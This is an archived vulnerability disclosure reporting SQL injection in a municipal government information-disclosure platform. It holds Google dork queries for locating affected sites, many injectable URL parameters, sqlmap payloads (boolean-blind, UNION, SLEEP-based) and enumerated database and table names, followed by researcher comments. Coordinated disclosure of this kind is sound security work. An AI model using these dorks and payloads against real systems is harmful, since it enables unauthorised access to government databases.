某直辖市专用政府信息公开平台多处SQL注射

admin 2015年5月2日14:25:47评论246 views字数 235阅读0分47秒阅读模式
摘要

2014-07-19: 细节已通知厂商并且等待厂商处理中
2014-07-22: 厂商已经确认,细节仅向厂商公开
2014-07-25: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-09-15: 细节向核心白帽子及相关领域专家公开
2014-09-25: 细节向普通白帽子公开
2014-10-05: 细节向实习白帽子公开
2014-10-15: 细节向公众公开

漏洞概要 关注数(17) 关注此漏洞

缺陷编号: WooYun-2014-68793

漏洞标题: 某直辖市专用政府信息公开平台多处SQL注射 某直辖市专用政府信息公开平台多处SQL注射

相关厂商: cncert国家互联网应急中心

漏洞作者:

提交时间: 2014-07-19 14:39

公开时间: 2014-10-15 14:40

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 18

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏


漏洞详情

披露状态:

2014-07-19: 细节已通知厂商并且等待厂商处理中
2014-07-22: 厂商已经确认,细节仅向厂商公开
2014-07-25: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-09-15: 细节向核心白帽子及相关领域专家公开
2014-09-25: 细节向普通白帽子公开
2014-10-05: 细节向实习白帽子公开
2014-10-15: 细节向公众公开

简要描述:

前面还有3个没审核,继续提交
求给力@

详细说明:

http://**.**.**.**/bugs/wooyun-2010-051318

该信息公开平台主要涉及天津市,看了下还有其他注入,整理了一下。

code 区域
google搜索:
#1 inurl:GZZDInfordetail.jsp?id
#2 inurl:FLGDInfordetail.jsp?id
#3 inurl:gkznInfo.jsp?depcode
#4 inurl:orgsiteInfo.jsp?orgid
#5 inurl:js_NDBGInfordetail.jsp?id

影响案例(空格区分注入点):

code 区域
http://**.**.**.**/tjep/GZZDInfordetail.jsp?id=43
http://**.**.**.**/GZZDInfordetail.jsp?id=17
http://**.**.**.**/GZZDInfordetail.jsp?id=10
http://**.**.**.**/GZZDInfordetail.jsp?id=11
http://**.**.**.**/GZZDInfordetail.jsp?id=5
http://**.**.**.**:7002/GZZDInfordetail.jsp?id=7
**.**.**.**/GZZDInfordetail.jsp?id=10
http://**.**.**.**/GZZDInfordetail.jsp?id=5
http://**.**.**.**/GZZDInfordetail.jsp?id=9
**.**.**.**/GZZDInfordetail.jsp?id=9
**.**.**.**/GZZDInfordetail.jsp?id=2
http://**.**.**.**:3030/GZZDInfordetail.jsp?id=14

http://**.**.**.**/tjep/FLGDInfordetail.jsp?id=43
http://**.**.**.**:8000/FLGDInfordetail.jsp?id=11
http://**.**.**.**/FLGDInfordetail.jsp?id=28
http://**.**.**.**/FLGDInfordetail.jsp?id=29
http://**.**.**.**:7002/FLGDInfordetail.jsp?id=14
http://**.**.**.**/FLGDInfordetail.jsp?id=5
**.**.**.**/FLGDInfordetail.jsp?id=11
http://**.**.**.**/FLGDInfordetail.jsp?id=10
**.**.**.**/FLGDInfordetail.jsp?id=2
http://**.**.**.**:8080/FLGDInfordetail.jsp?id=1
http://**.**.**.**:3030/FLGDInfordetail.jsp?id=11

http://**.**.**.**:8000/gkznInfo.jsp?depcode=BBA15M
http://**.**.**.**/gkznInfo.jsp?depcode=BOF04A
http://**.**.**.**/gkznInfo.jsp?depcode=BDA20B
http://**.**.**.**/gkznInfo.jsp?depcode=BNA05F
http://**.**.**.**/gkznInfo.jsp?depcode=BRA19G
http://**.**.**.**/gkznInfo.jsp?depcode=BJE01A
http://**.**.**.**:7002/gkznInfo.jsp?depcode=BQA07K
http://**.**.**.**/gkznInfo.jsp?depcode=BLA25I
http://**.**.**.**:8080/gkznInfo.jsp?depcode=BCE01A
http://**.**.**.**/gkznInfo.jsp?depcode=BFA02B
**.**.**.**/gkznInfo.jsp?depcode=CBA10E
**.**.**.**/gkznInfo.jsp?depcode=BE0000
**.**.**.**:7002/gkznInfo.jsp?depcode=BQA20L
**.**.**.**:8080/gkznInfo.jsp?depcode=BCA28A
**.**.**.**/gkznInfo.jsp?depcode=BKB23E
http://**.**.**.**/gkznInfo.jsp?depcode=BMF25A
**.**.**.**/gkznInfo.jsp?depcode=BMB04C
**.**.**.**/gkznInfo.jsp?depcode=BNB05L
http://**.**.**.**:3030/gkznInfo.jsp?depcode=BAE02A

http://**.**.**.**/tjep/orgsiteInfo.jsp?orgid=91
http://**.**.**.**/orgsiteInfo.jsp?orgid=102

http://**.**.**.**/js_NDBGInfordetail.jsp?id=5
http://**.**.**.**:8000/js_NDBGInfordetail.jsp?id=4
http://**.**.**.**/js_NDBGInfordetail.jsp?id=2
http://**.**.**.**/js_NDBGInfordetail.jsp?id=7
http://**.**.**.**/js_NDBGInfordetail.jsp?id=6
http://**.**.**.**/tjep/js_NDBGInfordetail.jsp?id=5
http://**.**.**.**:7002/js_NDBGInfordetail.jsp?id=13
http://**.**.**.**/js_NDBGInfordetail.jsp?id=8
http://**.**.**.**/js_NDBGInfordetail.jsp?id=4
http://**.**.**.**/js_NDBGInfordetail.jsp?id=5
http://**.**.**.**:8080/js_NDBGInfordetail.jsp?id=2
**.**.**.**/js_NDBGInfordetail.jsp?id=2
http://**.**.**.**/js_NDBGInfordetail.jsp?id=4
**.**.**.**/js_NDBGInfordetail.jsp?id=6

某直辖市专用政府信息公开平台多处SQL注射

某直辖市专用政府信息公开平台多处SQL注射

某直辖市专用政府信息公开平台多处SQL注射

某直辖市专用政府信息公开平台多处SQL注射

漏洞证明:

http://**.**.**.**:8000/gkznInfo.jsp?depcode=BBA15M

code 区域
---
Place: GET
Parameter: depcode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: depcode=BBA15M' AND 5496=5496 AND 'bqId'='bqId

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: depcode=-4714' UNION ALL SELECT NULL,CONCAT(0x71726f6d71,0x76476b67
5449646c7179,0x7172696f71)#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: depcode=BBA15M' AND SLEEP(5) AND 'uxUa'='uxUa
---
[22:34:30] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0.11
code 区域
available databases [5]:
[*] gbase
[*] govinfo
[*] information_schema
[*] northwind
[*] system
code 区域
Database: govinfo
[60 tables]
+-----------------------+
| all_info_tbl |
| appeal |
| apply_complaint_tbl |
| apply_delay_tbl |
| apply_fee_tbl |
| apply_indictment_tbl |
| apply_info_tbl |
| apply_pj_tbl |
| apply_reply_tbl |
| apply_update_tbl |
| applyuserview |
| au_function_rel |
| au_operator_info_tbl |
| au_role_function_rel |
| au_role_rel |
| au_user_role_rel |
| auapprolefunctionview |
| auoperatorroleview |
| commission_tbl |
| complaint |
| con_info_clob_tbl |
| con_info_reply_tbl |
| con_info_tbl |
| dbb_tbl |
| departments |
| dir_info_tbl |
| djlql_tbl |
| funs |
| get_way_tbl |
| ggl_tbl |
| gkzn_tbl |
| info_sort_tbl |
| link_tbl |
| mapping |
| messagerel |
| ndgzbg_tbl |
| operation_list_tbl |
| org_info_tbl |
| org_info_tbl_bak |
| org_site_info_tbl |
| org_user_info_tbl |
| org_user_info_tbl_bak |
| para_application_rel |
| para_depart_rank_rel |
| para_depart_rel |
| para_org_rel |
| pdf_tbl |
| plan_table |
| rolefuns |
| roles |
| roleusers |
| rules_info_tbl |
| sequence |
| user_roles_funs |
| users |
| visitcount |
| window_apply_info_tbl |
| work_time_tbl |
| zdsyh |
| zxwh_tbl |
+-----------------------+

修复方案:

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-07-22 14:23

厂商回复:

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-07-17 14:41 | U神 ( 核心白帽子 | Rank:1375 漏洞数:94 | 乌云核心菜鸟,此号处于联盟托管中....)

    0

    你的居然大厂商,我的省的系统才小厂商,不公平啊 @疯狗

  2. 2014-07-17 14:53 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:54 | 故乡的原风景.MP3)

    0

    目测又在搞重庆了

  3. 2014-07-17 14:55 | zhxs ( 实习白帽子 | Rank:69 漏洞数:26 | 不是你不行、只是路不平ฏ๎๎๎๎๎๎๎๎...)

    0

    @疯狗、、我的2014-06-04的漏洞都没有审核、、求审核啊、5555555

  4. 2014-07-17 14:58 | ( 普通白帽子 | Rank:1218 漏洞数:105 | 传闻中魇是一个惊世奇男子, 但是除了他华...)

    0

    @zhxs @袋鼠妈妈 @U神 坑爹啊 这个是我昨晚提交的,最早审核 10号的都还没审核

  5. 2014-07-17 15:07 | 疯子 ( 普通白帽子 | Rank:259 漏洞数:45 | 世人笑我太疯癫,我笑世人看不穿~)

    0

    目测又在搞重庆了

  6. 2014-07-17 15:08 | 低调的瘦子 ( 普通白帽子 | Rank:504 漏洞数:61 | loading……………………)

    0

    @U神 手里揣着一个省级系统命令执行漏洞,目测发了也是小厂商

  7. 2014-07-17 15:09 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:54 | 故乡的原风景.MP3)

    0

    @魇 貌似都一样呢. 之前提交的也还没有审核...昨晚的今早就审核了.太棒了 @疯狗

  8. 2014-07-17 16:40 | feiyu ( 普通白帽子 | Rank:114 漏洞数:25 )

    0

    为什么 我第一想到的就是重庆

  9. 2014-07-17 17:29 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:54 | 故乡的原风景.MP3)

    0

    @feiyu 好像其他不会用直辖市这个称呼,它们有更响亮滴名字,除了重庆

  10. 2014-07-17 18:23 | nextdoor ( 普通白帽子 | Rank:332 漏洞数:75 | Just for fun)

    0

    一天刷四个通用,一个也不走大厂商说不过去

  11. 2014-07-17 22:01 | ( 普通白帽子 | Rank:1218 漏洞数:105 | 传闻中魇是一个惊世奇男子, 但是除了他华...)

    0

    @nextdoor 无力了 连续过3个都是小厂商 都不知道在搞什么

  12. 2014-07-17 22:22 | nextdoor ( 普通白帽子 | Rank:332 漏洞数:75 | Just for fun)

    0

    我的也都是小厂商

  13. 2014-07-22 11:48 | ( 普通白帽子 | Rank:1218 漏洞数:105 | 传闻中魇是一个惊世奇男子, 但是除了他华...)

    0

    @cncert国家互联网应急中心 来确认吧

  14. 2014-07-22 22:28 | 从容 ( 普通白帽子 | Rank:415 漏洞数:96 | 哇啦啦啦啦啦 我的宝贝 | ..)

    0

    内裤还我

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin